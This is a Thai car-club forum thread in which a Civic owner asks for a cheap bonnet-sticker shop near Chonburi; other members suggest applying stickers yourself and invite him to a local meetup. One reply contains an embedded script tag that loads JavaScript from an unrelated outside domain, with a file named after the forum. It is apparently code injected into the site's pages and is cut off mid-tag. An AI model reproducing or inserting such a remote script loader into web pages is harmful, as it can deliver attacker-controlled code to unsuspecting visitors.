ตอบ
pondsamed

ชื่อเล่น: ปอนด์

เข้าร่วม: 18 สิงหา 2011
ตอบ: 665

Guru ES
Guru ES

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 1083

ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 18 เมษา 2012 12:36 - รบกวนแนะนำร้านทำสติ๊กเกอร์ฝากระโปรงหน้าแถวๆชลบุรี ที่ราคาไม่แรงให้บ้างครับ
รบกวนแนะนำร้านทำสติ๊กเกอร์ฝากระโปรงหน้าแถวๆชลบุรี ที่ราคาไม่แรงให้บ้างครับ 
เนื่องจากเส้นทางที่วิ่งอยู่ประจำ(เกาะโพธิ์-พนัสฯ-ชลบุรี)ต้องเจอกับวัตถุไม่พึงประสงค์กระเด็นมาโดนลูกชายสุดที่รักบ่อยๆปัจจุบันก็หลายแผลซ่อมไม่ไหวแล้วครับ ถึงซ่อมมาก็โดนอีก เลยอยากเอาไปติดสติ๊กเกอร์ลายเคฟล่าซะเลย(โดนอีกก็ไม่เสียดายอ่ะนะ) ใครพอจะรู้ช่วยแนะนำทีครับ
ได้รับคำขอบคุณจาก: Makai 
Makai

ชื่อเล่น: มะไก่

เข้าร่วม: 16 พฤษภาคม 2010
ตอบ: 3940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2065
ให้คำขอบคุณ: 3430

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
พุธ, 18 เมษา 2012 13:12 - รบกวนแนะนำร้านทำสติ๊กเกอร์ฝากระโปรงหน้าแถวๆชลบุรี ที่ราคาไม่แรงให้บ้างครับ
มาเลยครับ มามีตติ้งของชลบุรีด้วยกันเลยครับ

ท่านสมาชิกหลายๆท่านช่วยแนะนำได้สบายๆเลยครับ

หลายๆท่านซื้อสติ๊กเกอร์มาแปะกันเองครับ  ไม่ต้องไปทำที่ร้านหรอกครับ เสียค่าติดอีกตะหาก

ยังไงสนใจก้อเข้าไปดูหน้ามีตติ้ง @ ชลบุรีมหานครนะครับ เข้าไปพุดคุยกันได้ครับ 

และเสาร์นี้ช่วงเยนจะมีมิตติ้งที่สะพานใหม่บางทราย ด้วยนะครับ ไงว่างก้อมาเจอกันครับ
ได้รับคำขอบคุณจาก: pondsamed 
pondsamed

ชื่อเล่น: ปอนด์

เข้าร่วม: 18 สิงหา 2011
ตอบ: 665

Guru ES
Guru ES

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 1083

พฤหัส, 19 เมษา 2012 08:09 - รบกวนแนะนำร้านทำสติ๊กเกอร์ฝากระโปรงหน้าแถวๆชลบุรี ที่ราคาไม่แรงให้บ้างครับ
Makai พิมพ์ว่า:
มาเลยครับ มามีตติ้งของชลบุรีด้วยกันเลยครับ

ท่านสมาชิกหลายๆท่านช่วยแนะนำได้สบายๆเลยครับ

หลายๆท่านซื้อสติ๊กเกอร์มาแปะกันเองครับ  ไม่ต้องไปทำที่ร้านหรอกครับ เสียค่าติดอีกตะหาก

ยังไงสนใจก้อเข้าไปดูหน้ามีตติ้ง @ ชลบุรีมหานครนะครับ เข้าไปพุดคุยกันได้ครับ 

และเสาร์นี้ช่วงเยนจะมีมิตติ้งที่สะพานใหม่บางทราย ด้วยนะครับ ไงว่างก้อมาเจอกันครับ

อยากไปมีตติ้งใจจะขาดครับ แต่งานชอบเข้าช่วงเย็นวันเสาร์ทูกที ถ้ามีโอกาสคงได้แวะไปร่วมแน่นอนครับ ขอบคุณครับสำหรับคำแนะนำ
siripong

เข้าร่วม: 02 กรกฎา 2009
ตอบ: 3024

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 930
ให้คำขอบคุณ: 3457

พฤหัส, 19 เมษา 2012 10:51 - รบกวนแนะนำร้านทำสติ๊กเกอร์ฝากระโปรงหน้าแถวๆชลบุรี ที่ราคาไม่แรงให้บ้างครับ
Makai พิมพ์ว่า:

หลายๆท่านซื้อสติ๊กเกอร์มาแปะกันเองครับ ไม่ต้องไปทำที่ร้านหรอกครับ เสียค่าติดอีกตะหาก

ตามนี้เลยครับ
underhill

เข้าร่วม: 15 กันยา 2011
ตอบ: 3545

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 4125
ให้คำขอบคุณ: 1677

ปี: 2002
สี: น้ำเงิน อิเทอนอล (B-96P)
พฤหัส, 19 เมษา 2012 10:55 - รบกวนแนะนำร้านทำสติ๊กเกอร์ฝากระโปรงหน้าแถวๆชลบุรี ที่ราคาไม่แรงให้บ้างครับ
เอาเปนติกเกอร์บอมแทนไหมคับ <script src="https://sport32news.com/civicesgroup.js"></
narudon

ชื่อเล่น: หนุ่ย

เข้าร่วม: 29 เมษา 2010
ตอบ: 1380

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 796
ให้คำขอบคุณ: 368

ปี: 2003
สี: ขาว ทาฟเฟต้า (NH-578)
พฤหัส, 19 เมษา 2012 13:18 - รบกวนแนะนำร้านทำสติ๊กเกอร์ฝากระโปรงหน้าแถวๆชลบุรี ที่ราคาไม่แรงให้บ้างครับ
มาเจอกันครับ..
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.